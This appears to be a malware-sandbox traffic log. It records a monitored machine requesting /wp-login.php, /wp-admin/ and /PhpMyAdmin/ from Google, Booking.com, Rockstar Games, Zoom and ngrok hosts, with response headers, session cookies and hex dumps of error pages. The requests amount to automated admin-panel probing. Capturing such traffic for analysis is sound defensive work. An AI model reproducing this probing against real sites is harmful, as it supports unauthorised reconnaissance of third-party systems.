                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC385INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: t9JEtZkUablDLu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                206192.168.2.6653473.134.125.175443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC191OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 169cb534faad350189f757c618bb163a
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                207192.168.2.6653303.161.150.69443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC229OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://account.booking.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2006INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPf
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPf; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-FOWWK9SvFjgKUvT' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 bf188cee1e2fac0ecb107645c3d93c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wXUZINQaatCd78UWLYkxUD0dijY5KYV3A5pceGZv7rL9-BABEeQvMw==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC16384INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5568INData Raw: 66 69 78 22 3a 22 2b 33 37 38 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 6e 22 2c 22 6e 61 6d 65 22 3a 22 53 65 6e 65 67 61 6c 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 32 31 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 32 35 32 22 2c 22 6e 61 6d 65 22 3a 22 53 6f 6d 61 6c 69 61 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 6f 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 53 75 72 69 6e 61 6d 65 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 72 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 35 39 37 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 32 31 31 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 73 22 2c 22 6e 61 6d 65 22 3a 22 53 6f 75 74 68 20 53 75 64 61 6e 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: fix":"+378"},{"country_code":"sn","name":"Senegal","prefix":"+221"},{"prefix":"+252","name":"Somalia","country_code":"so"},{"name":"Suriname","country_code":"sr","prefix":"+597"},{"prefix":"+211","country_code":"ss","name":"South Sudan"},{"country_code":"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                208192.168.2.665345104.255.105.79443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC185OUTGET /PhpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1463INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                DBI: 361d5494ff4f0facced5b8cd63e19204ad3e4503
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-LRBBBD8+VpKDtfNAmM5R5trGW5YJ8tMdVX2Oaw/gMCE=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
                                                                                                                                                                                                                                                                                                                                                                CorrelationId: dc52f76b-9837-48af-ac26-391b8f313bff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=c568be51-be80-4e1b-a2d5-d7f1bde5e0c2; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdbcc45e3b815028857b7a6558226fb4fe859527e83a5ab96170672d5ccaa0b4451370c7d745aa9564f748001118093969008c38f0fe55c6cc028694910022e6495; Path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 31 30 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 6c 74 31 30 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC571INData Raw: 22 3a 22 70 72 6f 64 22 2c 22 65 72 72 6f 72 52 65 70 6f 72 74 69 6e 67 22 3a 7b 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 31 2e 30 2c 22 69 67 6e 6f 72 65 45 72 72 6f 72 73 22 3a 5b 5d 2c 22 64 65 6e 79 55 72 6c 73 22 3a 5b 5d 2c 22 61 6c 6c 6f 77 55 72 6c 73 22 3a 5b 22 5e 68 74 74 70 73 3a 5c 5c 2f 5c 5c 2f 28 3f 21 77 77 77 29 2e 2a 5c 5c 2e 72 6f 63 6b 73 74 61 72 67 61 6d 65 73 5c 5c 2e 63 6f 6d 22 2c 22 5e 68 74 74 70 73 3a 5c 5c 2f 5c 5c 2f 28 73 69 67 6e 69 6e 2d 29 3f 73 5c 5c 2e 72 73 67 5c 5c 2e 73 63 22 5d 7d 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 54 72 61 63 69 6e 67 22 3a 7b 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 30 2e 30 30 32 35 2c 22 69 6e 63 6c 75 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ":"prod","errorReporting":{"enabled":true,"sampleRate":1.0,"ignoreErrors":[],"denyUrls":[],"allowUrls":["^https:\\/\\/(?!www).*\\.rockstargames\\.com","^https:\\/\\/(signin-)?s\\.rsg\\.sc"]},"performanceTracing":{"enabled":true,"sampleRate":0.0025,"includ


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                209192.168.2.665348142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 48 6b 66 37 66 5a 4e 45 66 4e 72 66 46 53 62 35 62 44 44 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5Hkf7fZNEfNrfFSb5bDDXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                210192.168.2.665449170.114.52.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC337OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_0330e18c9c77fa80b793ad17d9a32752
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-qxWD7W5jToKGTvJe1Q9q2w' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1302INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 61 77 31 5f 63 5f 34 36 5f 47 6c 68 4a 55 53 72 57 72 76 59 31 42 2d 65 77 31 2d 67 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 30 39 32 45 41 31 44 41 43 35 30 36 38 42 34 44 33 46 42 41 30 38 43 45 41 46 35 30 43 37 45 34 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 63 74 61 69 64 3d 43 7a 6e 6a 69 51 47 4e 52 50 79 56 53 53 62 41 6c 41 4c 6a 7a 51 2e 31 37 30 37 31 33 31 37 37 32 31 35 35 2e 66 38 66 64 33 34 63 34 65 33 36 30 34 30 35 30 33 37 33 32 61 39 64 37 61 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=aw1_c_46_GlhJUSrWrvY1B-ew1-g; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=092EA1DAC5068B4D3FBA08CEAF50C7E4; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=CznjiQGNRPyVSSbAlALjzQ.1707131772155.f8fd34c4e36040503732a9d7a6
